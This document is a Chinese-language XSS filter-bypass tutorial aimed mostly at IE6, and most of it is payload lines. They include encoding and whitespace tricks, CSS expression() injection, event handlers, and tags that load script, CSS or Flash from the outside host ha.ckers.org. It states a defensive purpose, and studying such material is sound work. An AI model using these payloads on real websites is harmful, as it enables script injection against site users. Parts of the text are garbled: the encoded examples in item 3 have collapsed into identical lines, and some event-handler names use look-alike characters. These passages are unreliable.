XSS不具有瀏覽器通用性。不同的瀏覽器對同一XSS的適用不一樣。相比較而言,IE8和Firefox相對更安全,本身就對XSS攻擊有更嚴格的過濾。而IE6的安全性一般,即使攻擊者的代碼有些“變形”,瀏覽器還是會“盡力而爲”的解析。而其他的一些瀏覽器如opera,XSS安全處理可能做得更差。
本文基本上是在IE6的基礎上給大家分析XSS的變形和繞過。以便大家有針對性的防護。作者參閱了互聯網上一些XSS攻防實戰的例子,彙總成此文。
一、具體內容
XSS的一般原始構造:
<script>alert("anyunix")</script>
上述構造方式由於太過直接而容易被過濾,實際上,針對不同站點的不同過濾機制,對原始構造的適當變形有時就能繞過不少對XSS的檢測。
二、發展
1:很簡單,大家都知道會把<script>過濾掉,卻往往忽略了大小寫:
<sCripT>alert("anyunix")</Script>
2:<script>徹底被過濾了也不要緊,很多對象可以支持“javascript:”的形式代碼執行:
<IMG SRC=javascript:alert("anyunix")>
3:當簡單的"javascript"形式也被徹底過濾後。我們發現很多對象支持“&#ASCII”的表示方法,
<img src=javascript:alert("anyunix")>
<img src=javascript:alert('anyunix')>
<img src=javascript:alert('anyunix')>
<img src=javascript:alert('anyunix')>
a可以寫成a,a直至a也是可以執行的。
a也是可以寫成=,=直至=的。
4:如果上述編碼亦被還原過濾,可以填入空格、製表符、換行符等空白字符:
<IMG SRC="jav ascript:alert('anyunix');">
5:也可以嵌入編碼過後的TAB鍵等,char09,char10,char13都可以被嵌入:
<IMG SRC="jav	ascript:alert('anyunix');">
<IMG SRC="jav
ascript:alert('anyunix');">
<IMG SRC="jav
ascript:alert('anyunix');">
6:當直接用“javascript”終於被徹底禁絕,我們還可以使用其他屬性執行XSS。
<DIV STYLE="width:expression(alert('anyunix'));">
<IMG SRC='vbscript:msgbox("anyunix")'>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
7:然後,理所當然衍生了新的繞過方式和利用形式。
A):插入註釋/*....*/做干擾
<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">
B):全角字符的干擾
<DIV STYLE="width:expression(alert('anyunix'));">
C):“\”的干擾
<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>
8:如果直接執行被完全過濾,那我們就利用事件來執行XSS
<img src="#"οnerrοr=alert('anyunix')>
<img src=http://images.51cto.com/files/uploadimg/20130407/1014480.png"οnmοusemοve=alert(163)>
<BODY ONLOAD=alert('anyunix')>
<isindex type=imagesrc=1οnerrοr=alert('anyunix')>
9:flash可以用來執行XSS
<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>
10:也可以利用各種其他標籤
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">
<TABLE BACKGROUND="javascript:alert('XSS')">
其他的一些用於混淆、干擾和繞過的bypass實例:
<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>
perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out
<IMG SRC=" javascript:alert('XSS');">
如上,就是一些比較常見和實用的XSS繞過方法。在實際的運用中,往往是多種方法結合起來。
更多更詳盡的XSS測試腳本,可參見http://ha.ckers.org/xss.html建議參閱《OWASP測試指南》,對一些相關的web安全知識做全面的瞭解